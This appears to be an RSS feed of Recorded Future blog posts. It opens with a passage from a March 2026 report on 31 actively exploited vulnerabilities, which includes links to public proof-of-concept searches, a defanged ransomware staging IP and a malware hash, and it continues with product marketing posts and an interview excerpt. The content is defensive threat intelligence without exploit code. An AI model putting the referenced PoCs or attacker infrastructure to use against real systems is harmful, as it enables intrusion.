        <p>In March, Insikt Group® created Nuclei templates for a high-severity path traversal vulnerability in MindsDB (CVE-2026-27483) and a critical missing authentication vulnerability in Nginx UI (CVE-2026-27944). Additionally, Insikt Group® had already published a Nuclei template for <a href="https://app.recordedfuture.com/portal/intelligence-card/BBzIRBQ/overview">CVE-2025-68613</a> (n8n) in December, prior to its exploitation this month. We also identified public proof-of-concept (PoC) exploits for 10 of the 31 vulnerabilities.</p>
        <h2>Quick Reference: March 2026 Vulnerability Table</h2>
        <p><em>All 31 vulnerabilities below were actively exploited in March 2026. The table below also provides examples of public PoCs identified by Insikt Group®. These PoCs were not tested for accuracy or efficacy. Vulnerability management teams should exercise caution and verify the validity of PoCs before testing.</em></p>
        <div>
          <div>
            <div><strong>#</strong></div>
            <div><strong>Vulnerability</strong></div>
            <div><strong>Risk</strong><br /><strong>Score</strong></div>
            <div><strong>Affected Vendor/Product</strong></div>
            <div><strong>Vulnerability Type/Component</strong></div>
            <div><strong>Public PoC</strong></div>
          </div>
          <div>
            <div>1</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BFRKHY5/overview">CVE-2026-20131</a></div>
            <div>99</div>
            <div>Cisco Secure Firewall Management Center (FMC)</div>
            <div>CWE-502 (Deserialization of Untrusted Data)</div>
            <div><a href="https://github.com/search?q=CVE-2026-20131&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>2</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BFoBpjQ/insikt-group">CVE-2026-21262</a></div>
            <div>99</div>
            <div>Microsoft SQL Server (2016 SP3, 2017, 2019, 2022, 2025)</div>
            <div>CWE-284 (Improper Access Control)</div>
            <div>No</div>
          </div>
          <div>
            <div>3</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BFn9MQ7/overview">CVE-2026-26127</a></div>
            <div>99</div>
            <div>Microsoft .NET (9.0, 10.0) and Microsoft.Bcl.Memory</div>
            <div>CWE-125 (Out-of-bounds Read)</div>
            <div>No</div>
          </div>
          <div>
            <div>4</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BDX4YdD/overview">CVE-2026-3909</a></div>
            <div>99</div>
            <div>Google Skia</div>
            <div>CWE-787 (Out-of-bounds Write)</div>
            <div>No</div>
          </div>
          <div>
            <div>5</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BDYGD9W/overview">CVE-2026-3910</a></div>
            <div>99</div>
            <div>Google Chromium V8</div>
            <div>CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer)</div>
            <div>No</div>
          </div>
          <div>
            <div>6</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BDuduqq/overview">CVE-2026-3564</a></div>
            <div>99</div>
            <div>ConnectWise ScreenConnect</div>
            <div>CWE-347 (Improper Verification of Cryptographic Signature)</div>
            <div>No</div>
          </div>
          <div>
            <div>7</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BGDkG7T/overview">CVE-2026-33017</a></div>
            <div>99</div>
            <div>Langflow</div>
            <div>CWE-94 (Code Injection), CWE-95 (Eval Injection), CWE-306 (Missing Authentication for Critical Function)</div>
            <div><a href="https://github.com/search?q=CVE-2026-33017&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>8</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BC_b0iQ/overview">CVE-2026-3055</a></div>
            <div>99</div>
            <div>Citrix NetScaler</div>
            <div>CWE-125 (Out-of-bounds Read)</div>
            <div><a href="https://github.com/search?q=CVE-2026-3055&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>9</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BGZlyzi/overview">CVE-2026-33634</a></div>
            <div>99</div>
            <div>Aquasecurity Trivy</div>
            <div>CWE-506 (Embedded Malicious Code)</div>
            <div><a href="https://github.com/search?q=CVE-2026-33634&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>10</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BFoBple/overview">CVE-2026-25187</a></div>
            <div>94</div>
            <div>Microsoft Windows</div>
            <div>CWE-59 (Link Following)</div>
            <div>No</div>
          </div>
          <div>
            <div>11</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BGyXkVZ/overview">CVE-2026-33032</a></div>
            <div>94</div>
            <div>Nginx UI</div>
            <div>CWE-306 (Missing Authentication for Critical Function)</div>
            <div>No</div>
          </div>
          <div>
            <div>12</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BFJwFWu/overview">CVE-2026-21385</a></div>
            <div>89</div>
            <div>Qualcomm (Multiple Chipsets)</div>
            <div>CWE-190 (Integer Overflow or Wraparound)</div>
            <div>No</div>
          </div>
          <div>
            <div>13</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/_YufFK/overview">CVE-2025-53521</a></div>
            <div>99</div>
            <div>F5 BIG-IP</div>
            <div>CWE-121 (Stack-based Buffer Overflow)</div>
            <div>No</div>
          </div>
          <div>
            <div>14</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/5GY7RL/overview">CVE-2025-32432</a></div>
            <div>99</div>
            <div>Craft CMS</div>
            <div>CWE-94 (Code Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2025-32432&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>15</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/8EgOyF/overview">CVE-2025-54068</a></div>
            <div>99</div>
            <div>Laravel Livewire</div>
            <div>CWE-94 (Code Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2025-54068&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>16</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/5R0AQh/overview">CVE-2025-43510</a></div>
            <div>99</div>
            <div>Apple (Multiple Products)</div>
            <div>CWE-667 (Improper Locking)</div>
            <div>No</div>
          </div>
          <div>
            <div>17</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/5R0IDa/overview">CVE-2025-43520</a></div>
            <div>99</div>
            <div>Apple (Multiple Products)</div>
            <div>CWE-120 (Classic Buffer Overflow)</div>
            <div>No</div>
          </div>
          <div>
            <div>18</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/4vXkLn/overview">CVE-2025-31277</a></div>
            <div>99</div>
            <div>Apple (Multiple Products)</div>
            <div>CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer)</div>
            <div>No</div>
          </div>
          <div>
            <div>19</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BCABqPu/overview">CVE-2025-66376</a></div>
            <div>99</div>
            <div>Synacor Zimbra Collaboration Suite (ZCS)</div>
            <div>CWE-79 (Cross-site Scripting)</div>
            <div>No</div>
          </div>
          <div>
            <div>20</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BC79ud1/overview">CVE-2026-20963</a></div>
            <div>99</div>
            <div>Microsoft SharePoint</div>
            <div>CWE-502 (Deserialization of Untrusted Data)</div>
            <div><a href="https://github.com/jenniferreire26/CVE-2026-20963">Yes</a></div>
          </div>
          <div>
            <div>21</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/5913NU/overview">CVE-2025-47813</a></div>
            <div>99</div>
            <div>Wing FTP Server</div>
            <div>CWE-209 (Generation of Error Message Containing Sensitive Information)</div>
            <div>No</div>
          </div>
          <div>
            <div>22</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBzIRBQ/overview">CVE-2025-68613</a></div>
            <div>99</div>
            <div>n8n</div>
            <div>CWE-913 (Improper Control of Dynamically-Managed Code Resources)</div>
            <div><a href="https://github.com/search?q=CVE-2025-68613&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>23</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/k5mef6/overview">CVE-2021-22054</a></div>
            <div>99</div>
            <div>Omnissa Workspace One UEM</div>
            <div>CWE-918 (SSRF)</div>
            <div><a href="https://github.com/MKSx/CVE-2021-22054">Yes</a></div>
          </div>
          <div>
            <div>24</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/3LwTz8/overview">CVE-2025-26399</a></div>
            <div>99</div>
            <div>SolarWinds Web Help Desk</div>
            <div>CWE-502 (Deserialization of Untrusted Data)</div>
            <div>No</div>
          </div>
          <div>
            <div>25</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BDPo5zB/overview">CVE-2026-1603</a></div>
            <div>99</div>
            <div>Ivanti Endpoint Manager (EPM)</div>
            <div>CWE-288 (Authentication Bypass Using an Alternate Path or Channel)</div>
            <div>No</div>
          </div>
          <div>
            <div>26</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/TKKaG7/overview">CVE-2017-7921</a></div>
            <div>99</div>
            <div>Hikvision (Multiple Products)</div>
            <div>CWE-287 (Improper Authentication)</div>
            <div><a href="https://github.com/search?q=CVE-2017-7921&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>27</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/hZXl2g/overview">CVE-2021-22681</a></div>
            <div>99</div>
            <div>Rockwell (Multiple Products)</div>
            <div>CWE-522 (Insufficiently Protected Credentials)</div>
            <div>No</div>
          </div>
          <div>
            <div>28</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/ssAv1Q/overview">CVE-2023-43000</a></div>
            <div>99</div>
            <div>Apple (Multiple Products)</div>
            <div>CWE-416 (Use After Free)</div>
            <div>No</div>
          </div>
          <div>
            <div>29</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/lEMfcP/overview">CVE-2021-30952</a></div>
            <div>92</div>
            <div>Apple (Multiple Products)</div>
            <div>CWE-190 (Integer Overflow or Wraparound)</div>
            <div>No</div>
          </div>
          <div>
            <div>30</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/t5YiER/overview">CVE-2023-41974</a></div>
            <div>99</div>
            <div>Apple iOS and iPadOS</div>
            <div>CWE-416 (Use After Free)</div>
            <div>No</div>
          </div>
          <div>
            <div>31</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEwAt0u/overview">CVE-2026-22719</a></div>
            <div>89</div>
            <div>Broadcom VMware Aria Operations</div>
            <div>CWE-77 (Command Injection)</div>
            <div>No</div>
          </div>
        </div>
        <p><em><strong>Table 1:</strong></em> <em>List of vulnerabilities that were actively exploited in March based on Recorded Future data.</em></p>
        <h2>Key Trends: March 2026</h2>
        <ul>
          <li>Most commonly observed weaknesses: CWE-502 (Deserialization of Untrusted Data) and CWE-94 (Code Injection).</li>
          <li>Two vulnerabilities and one exploit kit (consisting of 23 exploits, 12 of which are currently associated with specific CVEs) were linked to malware campaigns.
            <ul>
              <li>Interlock Ransomware Group exploited a zero-day in Cisco Secure Firewall Management Center to compromise enterprise networks, deploy custom remote access trojans (RATs), and facilitate ransomware operations.</li>
              <li>Separately, the DarkSword iOS full-chain exploit enabled Safari-based remote code execution (RCE), sandbox escape, and kernel-level access, leading to deployment of the GHOSTKNIFE, GHOSTSABER, and GHOSTBLADE payloads.</li>
              <li>The Coruna exploit kit similarly compromised iOS devices to deliver the PlasmaLoader (PLASMAGRID) malware.</li>
            </ul>
          </li>
          <li>9 of the 31 vulnerabilities (<a href="https://app.recordedfuture.com/portal/intelligence-card/BDYGD9W/overview">CVE-2026-3910</a>, <a href="https://app.recordedfuture.com/portal/intelligence-card/BGDkG7T/overview">CVE-2026-33017</a>, <a href="https://app.recordedfuture.com/portal/intelligence-card/5GY7RL/overview">CVE-2025-32432</a>, <a href="https://app.recordedfuture.com/portal/intelligence-card/8EgOyF/overview">CVE-2025-54068</a>, <a href="https://app.recordedfuture.com/portal/intelligence-card/BC79ud1/overview">CVE-2026-20963</a>, <a href="https://app.recordedfuture.com/portal/intelligence-card/BBzIRBQ/overview">CVE-2025-68613</a>, <a href="https://app.recordedfuture.com/portal/intelligence-card/3LwTz8/overview">CVE-2025-26399</a>, <a href="https://app.recordedfuture.com/portal/intelligence-card/lEMfcP/overview">CVE-2021-30952</a>, and <a href="https://app.recordedfuture.com/portal/intelligence-card/t5YiER/overview">CVE-2023-41974</a>) allowed attackers to conduct RCE.
            <ul>
              <li>These 9 vulnerabilities affected Google, Langflow, Craft CMS, Laravel, Microsoft, n8n, SolarWinds, and Apple.</li>
            </ul>
          </li>
        </ul>
        <h2>Exploitation Analysis</h2>
        <p>This section analyzes two of the highest-impact, actively exploited vulnerabilities this month. Where applicable, it also highlights the availability of Nuclei templates created by Insikt Group®. The full list of reports and detection rules from March is available to customers in the Recorded Future Intelligence Operations Platform.</p>
        <h3>Interlock Ransomware Group Exploits Cisco FMC Zero-Day (CVE-2026-20131)</h3>
        <p>On March 18, 2026, Amazon Threat Intelligence published an analysis detailing an ongoing <a href="https://app.recordedfuture.com/portal/intelligence-card/zVBC51/overview">Interlock ransomware</a> campaign exploiting <a href="https://app.recordedfuture.com/portal/intelligence-card/BFRKHY5/overview">CVE-2026-20131</a>. CVE-2026-20131 is a critical vulnerability affecting <a href="https://app.recordedfuture.com/portal/intelligence-card/QtqtQ_/overview">Cisco’s Secure Firewall Management Center (FMC)</a> software that allows unauthenticated threat actors to execute arbitrary Java code as root on vulnerable devices. Cisco Secure FMC is a centralized management platform that allows administrators to configure, monitor, and control Cisco firewall devices and network security policies across an enterprise environment. According to Amazon Threat Intelligence, <a href="https://app.recordedfuture.com/portal/intelligence-card/zeRf3k/overview">Interlock Ransomware Group</a> exploited CVE-2026-20131 as a zero-day vulnerability beginning January 26, 2026, indicating active exploitation prior to its public disclosure and enabling early compromise of enterprise networks.</p>
        <p>The Interlock Ransomware Group gains initial access to vulnerable Cisco FMC instances by sending crafted HTTP requests that trigger CVE-2026-20131 and execute arbitrary Java code as root. After gaining access, the threat actors deploy a malicious ELF binary from a staging server at <em>37[.]27[.]244[.]222</em> (<a href="https://app.recordedfuture.com/portal/intelligence-card/ip%3A37.27.244.222/overview">Intelligence Card</a>) to support follow-on operations.</p>
        <p>They then use custom Java- and JavaScript-based RATs, a memory-resident web shell, and proxy infrastructure to maintain access, enable lateral movement, and evade detection. Post-compromise activity includes reconnaissance, data collection and staging, and the use of legitimate tools such as ConnectWise ScreenConnect, Volatility, and Certify for remote access, credential theft, and privilege escalation.</p>
        <p>Insikt Group® obtained a screen locker sample (SHA256: <a href="https://app.recordedfuture.com/portal/intelligence-card/hash%3A6c8efbcef3af80a574cb2aa2224c145bb2e37c2f3d3f091571708288ceb22d5f/overview">6c8efbcef3af80a574cb2aa2224c145bb2e37c2f3d3f091571708288ceb22d5f</a>), shared by Amazon Threat Intelligence, from <a href="https://www.recordedfuture.com/products/cyber-operations">Recorded Future Malware Intelligence</a>. Sandbox analysis detected the sample as benign. Based on sandbox and static code analysis, the sample performs the following actions on a victim’s machine:</p>
        <ul>
          <li>Changes the machine’s desktop wallpaper to a pornographic image</li>
          <li>Delays execution using the Sleep API function for evasion</li>
          <li>Detects debuggers by comparing timings obtained from the GetTickCount API function</li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_14593205f4bb65550cdd0b13d3c24d69dff8887b9.png?width=750&amp;format=png&amp;optimize=medium" width="2048" height="984" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em>Risk Rules History from Hash Intelligence Card® for 6c8efbcef3af80a574cb2aa2224c145bb2e37c2f3d3f091571708288ceb22d5f in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1eb057ac8d9e33292f2d343e2c01e9ea4a86902bd.jpg?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[VIP Credential Monitoring Blog]]></title>
            <link>https://www.recordedfuture.com/blog/vip-credential-monitoring-blog</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/vip-credential-monitoring-blog</guid>
            <pubDate>Fri, 10 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Executives and high-privilege users are prime targets for credential theft — and standard monitoring often misses them. Learn how VIP Credential Monitoring in Recorded Future Identity Intelligence protects your most sensitive accounts across work and personal email, and why detection speed is the difference between a resolved alert and a major incident.]]></description>
            <content:encoded><![CDATA[
        <p>There's a category of employee credentials where standard monitoring often falls short: those belonging to executives, finance leaders, IT administrators, and others with privileged access, all of whom have a large target on their back.</p>
        <p>VIP Credential Monitoring in Recorded Future is built to solve this problem. It continuously monitors for credential exposures tied to your most sensitive individuals across both work and personal accounts, and alerts your team fast enough to act before an account takeover occurs.</p>
        <h2>The Challenge with Protecting Your Most Targeted People</h2>
        <p>According to <a href="https://www.verizon.com/business/resources/reports/2025-dbir-executive-summary.pdf">Verizon's 2025 Data Breach Investigations Report</a>, credential abuse was the most prominent initial access vector observed across breaches. Attackers don't need to find a technical vulnerability to get inside your organization. Stolen credentials are widely available across criminal forums and dark web marketplaces, and buying access is often faster and cheaper than building an exploit.</p>
        <p>What makes this particularly calculated is how threat actors decide which credentials to buy. Infostealer malware logs don't just capture usernames and passwords — they capture the authorization URLs where those credentials were entered. According to Recorded Future’s <a href="https://www.recordedfuture.com/blog/identity-trend-report-march-blog">2025 Identity Threat Landscape Report</a>, 7 million credentials were indexed with identifiable authorization URLs, with 63.2% of those having been linked to authentication systems.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1a62ce422e875506eaab3067aac23093b66512971.png?width=750&amp;format=png&amp;optimize=medium" width="932" height="599" />
            </div>
          </div>
          <div>
            <div><strong>Figure 1</strong>: Top authorization URL categories, 2025 (Source: Recorded Future)</div>
          </div>
        </div>
        <p>That means attackers can usually identify which access endpoints a set of credentials unlocks, and they prioritize accordingly. Executives and anyone with broad access to systems and data sit at the top of that list.</p>
        <p>The 2025 cyber attack on the University of Pennsylvania illustrates exactly how this plays out. A threat actor compromised a single employee's SSO credential and used it to move laterally across corporate systems, ultimately exposing data on approximately 1.2 million donors, alumni, and students. One credential, one login, and an organizational crisis.</p>
        <p>The threat doesn't stop at corporate accounts. When attackers can't get hold of an executive's work credentials, they target personal accounts for these high-value targets. A personal email or social account can expose sensitive communications, private information, or material an attacker can use for extortion.</p>
        <p>Corporate security controls don't extend to personal accounts. When those credentials are stolen, most security teams have no line of sight.</p>
        <p>That gap between exposure and discovery is where the risk lives. Credentials stolen by infostealer malware are often purchased and weaponized within 48 hours of the compromise, potentially days or weeks before a security team has any indication something is wrong. For standard employee accounts, that window is serious. For your CEO or Head of Engineering, it's critical.</p>
        <h2>Monitoring Built for High-Value Targets</h2>
        <p>VIP Credential Monitoring provides continuous monitoring and alerting on compromised credentials for your high-value targets. Security teams can add personal or work email addresses for their executives and others with widespread access.</p>
        <p>From that point forward, Recorded Future continuously monitors for those accounts across its full source coverage: infostealer malware logs from 30+ malware families, dark web forums, criminal marketplaces, paste sites, and breach dumps. When a VIP credential surfaces in that data, the team receives an alert with full contextual detail (malware family, authorization URL, compromised host information, etc.) so they can act with confidence.</p>
        <p>Many executive monitoring solutions surface credential data that is days or weeks old by the time it reaches an analyst. By then, the window to get ahead of an attacker has often closed. <a href="https://www.recordedfuture.com/blog/identity-trend-report-march-blog">For all stolen credentials indexed in 2025</a>, Recorded Future detected 36.4% within 24 hours of exfiltration, and 52.9% within one week.</p>
        <p>The gap between when credentials are stolen and when a security team finds out is where breaches happen. Recorded Future closes that gap.</p>
        <p>When a VIP credential appears in exposure data, teams can initiate a password reset, review active sessions, or reach out directly to the individual — all before the credential is exploited. For identities that carry this level of organizational risk, getting ahead of the exposure isn't just operationally valuable; it can be the difference between a resolved alert and a significant incident.</p>
        <h2>A Complete Picture of Identity Exposure</h2>
        <p>VIP Credential Monitoring is built on the same intelligence infrastructure that powers Recorded Future <a href="https://www.recordedfuture.com/products/identity-intelligence">Identity Intelligence</a> broadly: the same source coverage, the same detection engine, the same alert and triage workflow. It applies that capability to a category of identities that warrant closer attention, without requiring a separate tool, process, or integration. That's the logic behind Identity Intelligence as a whole: a unified view of credential exposure across every category of identity your organization needs to protect, covering employees, customers, and your highest-risk individuals.</p>
        <p>For teams already using Identity Intelligence to monitor employee and customer credentials, VIP Monitoring is a targeted extension of coverage that fits into what they've already built. Any VIP credentials identified will benefit from the same core features of Identity Intelligence.</p>
        <p>This includes Incident Reports, which surface any other credentials that may have been compromised from the same machine, and Customizable Alerting, which streamlines prioritization of these detections and can trigger response workflows through existing integrations with Okta, Microsoft Entra ID, XSOAR, Splunk, and others.</p>
        <p>Attackers don't limit their targets to one type of account, and your monitoring shouldn't either. To see where you stand today, request a free <a href="https://pages.recordedfutureext.com/IdentityExposureReport_LandingPage.html">Identity Exposure Assessment Report</a> and get a concrete, evidence-based picture of your organization's credential exposure over the past year. Contact us to learn more about how Recorded Future can help your organization protect its identities and to see a demo of the platform in action.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_189c2081486ef4c5b4333dd74730e898e793786a9.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Third-Party Risk Is an Intelligence Operation. It's Time We Treated It Like One.]]></title>
            <link>https://www.recordedfuture.com/blog/recorded-future-sees-its-inclusion-in-the-2026-forrester-wave</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/recorded-future-sees-its-inclusion-in-the-2026-forrester-wave</guid>
            <pubDate>Thu, 09 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Recorded Future sees its inclusion in the 2026 Forrester Wave™ for Cybersecurity Risk Ratings Platforms as a reflection of a broader truth: the era of ratings-only vendor risk management is over.]]></description>
            <content:encoded><![CDATA[
        <p>For years, the cybersecurity industry has treated third-party risk management as a compliance exercise. Assess your vendors. Assign a score. File the report. Move on. That model was built for a different era. One where supply chains were smaller, threat actors were less sophisticated, and a quarterly questionnaire could reasonably approximate a vendor's security posture. That era is over.</p>
        <p>Today, the average enterprise works with hundreds of third parties. Threat actors actively target the weakest links across those supply chains, not because the vendors themselves are the prize, but because they're the path of least resistance into larger, more valuable targets.</p>
        <p>Ransomware groups list vendors on extortion sites before those vendors even know they've been compromised. Stolen employee credentials surface on dark web forums undetected. Critical vulnerabilities are weaponized in hours, not months. In this environment, a security rating is necessary. But it is nowhere near sufficient.</p>
        <h2>Recognized in the 2026 Forrester Wave™</h2>
        <p>Recorded Future was recently included in The Forrester Wave™: Cybersecurity Risk Ratings Platforms, Q2 2026. (The report is available online to <a href="https://www.forrester.com/report/RES192714">Forrester customers or for purchase here</a>.)</p>
        <p>We see this recognition as a reflection of the market's evolution — and as an acknowledgement of the direction we've been building toward.</p>
        <p>We believe the cybersecurity risk ratings market is at an inflection point. Analysts and practitioners alike recognize that the category is moving beyond standalone ratings toward integrated intelligence and actionable insights. We see our inclusion in this evaluation as confirmation that the convergence of hygiene data and threat intelligence isn't a niche play — it's where the market is heading. In light of where the ratings market is today, let’s dive into where Recorded Future is going and how Recorded Future envisions the future of securing the third-party ecosystem.</p>
        <h2>The Gap Between Hygiene and Intelligence</h2>
        <p>Cyber risk ratings have earned their place in the security stack. They provide a standardized, scalable way to evaluate a vendor's external security posture — patching cadence, encryption practices, DNS configuration, exposed services. That hygiene baseline matters. It's a correlative signal for breach potential, and it gives risk teams a common language for comparing vendors and benchmarking against industry peers.</p>
        <p>But hygiene ratings only answer part of the problem: <em>How well is this vendor maintaining their defenses?</em></p>
        <p>They don't tell you whether anyone is actively trying to breach those defenses. They don't surface the dark web chatter on a specific vendor. They don't alert you when a vendor's credentials are leaked or when a vendor has an active malware infection. This is the gap that has left third-party risk programs perpetually reactive. Teams learn about vendor compromises from news headlines or from the vendors themselves — often days or weeks after the initial breach. By then, the window for proactive response may have closed.</p>
        <p>From our own customer conversations, we hear that security and risk teams have shifted from wanting ratings and accuracy alone to demanding intelligence that reveals real cybersecurity risk, with prioritized findings and actionable remediation guidance. Ratings are increasingly commoditized. The differentiation now lies in what you do with the data, and what additional signals you bring to the table.</p>
        <h2>Third-Party Risk Management Is an Intelligence Operation</h2>
        <p>If you accept that ratings alone aren't enough, the logical next step is clear: third-party risk management must be treated as an intelligence operation.</p>
        <p>That means combining the hygiene baseline — the outside-in view of a vendor's security posture — with real-time threat intelligence that tells you who is being targeted, how, and what you should do about it. It means shifting from periodic assessments to continuous monitoring. It means equipping risk teams with the context to distinguish between a low-priority configuration issue and a vendor whose infrastructure is actively under attack. This is the problem <a href="https://www.recordedfuture.com/products/third-party-intelligence">Recorded Future Third-Party Risk</a> was built to solve.</p>
        <p>We've brought together two distinct capabilities that, until now, existed in separate worlds.</p>
        <ol>
          <li><a href="https://www.riskrecon.com/">RiskRecon</a> — built over a decade as one of the industry's leading cyber risk ratings platforms, trusted by 21,500+ users across 30+ industries, provides the hygiene foundation: transparent, evidence-backed security ratings evaluated across 40+ criteria in 9 security domains, with 99% audited data accuracy.</li>
          <li><a href="https://www.recordedfuture.com/platform">Recorded Future's threat intelligence capabilities</a>, powered by collection and analysis across more than 1 million sources, adds the threat dimension: real-time alerting on ransomware extortion activity, dark web exposures, credential leaks, and active vulnerability exploitation — often before the affected vendor is even aware.</li>
        </ol>
        <p>Together, these capabilities create something the market hasn't had before: <strong>a single solution that covers the full lifecycle of third-party risk, from initial assessment and onboarding through continuous monitoring and incident response</strong>.</p>
        <h2>What This Looks Like in Practice</h2>
        <p>The value of combining hygiene ratings with threat intelligence isn't theoretical. Our customers are already seeing it play out.</p>
        <ul>
          <li>When a vendor appears on a ransomware extortion site, Third-Party Risk customers can receive alerts in hours — not the days or weeks it takes for vendor self-disclosure.</li>
          <li>When credentials associated with a monitored vendor surface on dark web markets, risk teams can initiate outreach and remediation before those credentials are weaponized.</li>
          <li>When a critical vulnerability is disclosed, intelligence context helps analysts determine which vendors are actually exposed and at risk of exploitation, rather than treating every vendor with the affected software as equally urgent.</li>
        </ul>
        <p>Customers consistently report a roughly 33% increase in visibility into third-party risks after adopting the platform (<a href="https://app.userevidence.com/assets/5382HRMQ">UserEvidence</a>). Teams save an average of 7 hours per week that was previously spent on manual research and monitoring (<a href="https://app.userevidence.com/assets/6884WZGT">UserEvidence</a>). And customers routinely detect vendor incidents before the vendor itself has disclosed — turning what used to be a reactive scramble into a controlled, proactive response.</p>
        <p>These aren't incremental improvements. They represent a fundamental shift from reactive compliance to proactive risk management.</p>
        <h2>Where We're Going</h2>
        <p>We're not done. Bringing RiskRecon and Recorded Future together was the first step in a broader vision for what third-party risk management should become.</p>
        <p>Our roadmap is focused on deepening the integration between these two platforms into a unified experience. One where hygiene ratings, threat intelligence, and risk workflows operate seamlessly together. We're investing in AI-driven capabilities that will help risk analysts cut through noise faster, automate routine assessment workflows, and surface the insights that matter most. And we're building toward predictive intelligence that doesn't just tell you what's happening now, but helps you anticipate where risk is headed.</p>
        <p>The goal is straightforward: make third-party risk management as data-driven, automated, and intelligence-led as the best security operations programs already are.</p>
        <h2>Join the Shift to Intelligence-Driven Third-Party Risk</h2>
        <p>Third-party risk programs that rely exclusively on hygiene ratings will continue to be caught off guard. The vendors who score well on a Tuesday can be breached by Wednesday. The questionnaire response you received last quarter may not reflect today's reality.</p>
        <p>The organizations that are getting ahead of this are the ones treating third-party risk as what it actually is: an intelligence operation that requires continuous monitoring, real-time alerting, and the context to act decisively when something changes.</p>
        <p>That's the future we're building. And we believe we're the only ones building it with the depth of intelligence and the strength of ratings data required to get it right.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_100e70f38b09c3ffd0d78368f1b1fb6b9fab24f95.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Day in the Life: Product Manager at Recorded Future]]></title>
            <link>https://www.recordedfuture.com/blog/kyle-kohler-product-manager</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/kyle-kohler-product-manager</guid>
            <pubDate>Fri, 03 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[VentureFizz interviews Senior Product Manager Kyle Kohler on his role at Recorded Future]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>Recorded Future is the World’s Largest Intelligence Company. Our team works to build products that customers love. In this video, Kyle Kohler interviewed with VentureFizz about his day-to-day as a Senior Product Manager for Integrations. He describes the job as truly multifaceted, encompassing starting new strategic initiatives, turning customer feedback into improvements, and enabling other team members to do the same. Full video and transcript available below.</div>
          </div>
        </div>
        <div>
          <div>
            <div><a href="https://www.youtube.com/watch?v=EbnzqFfySs0&amp;t=94s">https://www.youtube.com/watch?v=EbnzqFfySs0&amp;t=94s</a></div>
          </div>
        </div>
        <p><strong>Read the Full Video Transcript:</strong></p>
        <p>I’m Kyle Kohler. I’m a product manager over the integration strategy at Recorded Future.</p>
        <p>Recorded Future is the world’s largest threat intelligence provider. We are covering all sorts of domains of intelligence. It’s geopolitical intelligence, cyber intelligence, payment fraud intelligence. And essentially intelligence is this data that an organization uses to take action and make a better decision. So the more that you understand a subject or topic, a current event, the better that you can define what actions you take to either defend your organization or proactively increase your competitive edge.</p>
